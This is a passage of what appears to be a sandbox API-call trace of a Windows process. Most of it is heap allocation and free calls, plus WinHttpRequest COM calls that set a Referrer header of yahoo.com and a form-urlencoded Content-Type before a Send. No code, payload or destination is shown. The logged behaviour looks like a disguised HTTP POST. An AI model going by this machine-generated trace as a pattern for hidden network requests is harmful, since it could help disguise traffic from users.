(HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfaa50 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa08 | out: hHeap=0xbe0000) returned 1 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f28 | out: hHeap=0xbe0000) returned 1 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa150 | out: hHeap=0xbe0000) returned 1 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02f80 | out: hHeap=0xbe0000) returned 1 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218c8 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd010d0 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x22) returned 0xe08958 [0247.929] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc26c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8befb8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x8bf0bc | out: rgDispId=0x8bf0bc*=2) returned 0x0 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08958 | out: hHeap=0xbe0000) returned 1 [0247.929] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc26c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8befb0 | out: ppTInfo=0x8befb0*=0xe15994) returned 0x0 [0247.930] ITypeInfo:RemoteGetTypeAttr (in: This=0xe15994, ppTypeAttr=0x8befa8, pDummy=0x356310 | out: ppTypeAttr=0x8befa8, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalGetIDsOfNames (This=0xe15994) returned 0x0 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x0, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x1, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x2, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x3, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x4, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x5, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x6, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x7, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x8, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x9, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0xa, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.930] ITypeInfo:LocalReleaseTypeAttr (This=0xe15994) returned 0xdc6698 [0247.930] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.930] WinHttpRequest:IUnknown:Release (This=0xe15994) returned 0x1 [0247.930] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x34) returned 0xe33e10 [0247.931] WinHttpRequest:IDispatch:Invoke (in: This=0xc26c30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8bf0a0*(rgvarg=([0]=0xe33e14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xe33e24*(varType=0x8, wReserved1=0x0, wReserved2=0xd71a, wReserved3=0x317c, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068, puArgErr=0x8bf0b0 | out: pDispParams=0x8bf0a0*(rgvarg=([0]=0xe33e14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xe33e24*(varType=0x8, wReserved1=0x0, wReserved2=0xd71a, wReserved3=0x317c, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8bf0b0*=0x2b5995) returned 0x0 [0247.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd010d0 | out: hHeap=0xbe0000) returned 1 [0247.931] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0247.931] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfaa08 [0247.931] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a08 [0247.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33e10 | out: hHeap=0xbe0000) returned 1 [0247.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0247.931] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0247.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f28 | out: hHeap=0xbe0000) returned 1 [0247.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe57758 | out: hHeap=0xbe0000) returned 1 [0247.931] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a68 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa180 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa50 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02fa8 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa08 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.932] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a08 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21998 [0247.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe57758 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02fa8 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa0c0 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfaa08 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa198 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfaa50 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa180 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a68 [0247.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a68 | out: hHeap=0xbe0000) returned 1 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02f80 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa078 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a68 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f28 | out: hHeap=0xbe0000) returned 1 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a68 | out: hHeap=0xbe0000) returned 1 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f28 | out: hHeap=0xbe0000) returned 1 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa08 | out: hHeap=0xbe0000) returned 1 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa50 | out: hHeap=0xbe0000) returned 1 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa180 | out: hHeap=0xbe0000) returned 1 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02fa8 | out: hHeap=0xbe0000) returned 1 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa180 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a68 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd010d0 [0247.933] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x22) returned 0xe08958 [0247.933] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc26c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8befb8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x8bf0bc | out: rgDispId=0x8bf0bc*=2) returned 0x0 [0247.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08958 | out: hHeap=0xbe0000) returned 1 [0247.934] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc26c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8befb0 | out: ppTInfo=0x8befb0*=0xe15994) returned 0x0 [0247.934] ITypeInfo:RemoteGetTypeAttr (in: This=0xe15994, ppTypeAttr=0x8befa8, pDummy=0x356310 | out: ppTypeAttr=0x8befa8, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalGetIDsOfNames (This=0xe15994) returned 0x0 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x0, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x1, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x2, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x3, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x4, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x5, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x6, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x7, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x8, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x9, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0xa, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.934] ITypeInfo:LocalReleaseTypeAttr (This=0xe15994) returned 0xdc6698 [0247.934] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.934] WinHttpRequest:IUnknown:Release (This=0xe15994) returned 0x1 [0247.935] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x34) returned 0xe33e10 [0247.935] WinHttpRequest:IDispatch:Invoke (in: This=0xc26c30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8bf0a0*(rgvarg=([0]=0xe33e14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xe33e24*(varType=0x8, wReserved1=0x0, wReserved2=0xd71a, wReserved3=0x317c, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068, puArgErr=0x8bf0b0 | out: pDispParams=0x8bf0a0*(rgvarg=([0]=0xe33e14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xe33e24*(varType=0x8, wReserved1=0x0, wReserved2=0xd71a, wReserved3=0x317c, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8bf0b0*=0x2b5995) returned 0x0 [0247.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd010d0 | out: hHeap=0xbe0000) returned 1 [0247.935] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0247.935] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0247.935] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218c8 [0247.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33e10 | out: hHeap=0xbe0000) returned 1 [0247.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa180 | out: hHeap=0xbe0000) returned 1 [0247.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a68 | out: hHeap=0xbe0000) returned 1 [0247.935] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa180 [0247.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0247.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe57758 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02f80 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa180 | out: hHeap=0xbe0000) returned 1 [0247.936] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218c8 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa180 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a08 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02f80 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa198 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfb620 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02fa8 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa078 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0247.936] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02f80 | out: hHeap=0xbe0000) returned 1 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0247.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21998 [0247.937] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd010d0 [0247.937] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa) returned 0xcfa198 [0247.937] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc26c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8befb8*="Send", cNames=0x1, lcid=0x800, rgDispId=0x8bf0bc | out: rgDispId=0x8bf0bc*=5) returned 0x0 [0247.937] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0247.937] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc26c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8befb0 | out: ppTInfo=0x8befb0*=0xe15994) returned 0x0 [0247.937] ITypeInfo:RemoteGetTypeAttr (in: This=0xe15994, ppTypeAttr=0x8befa8, pDummy=0x356310 | out: ppTypeAttr=0x8befa8, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalGetIDsOfNames (This=0xe15994) returned 0x0 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x0, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x1, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x2, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x3, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x4, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x5, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x6, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc 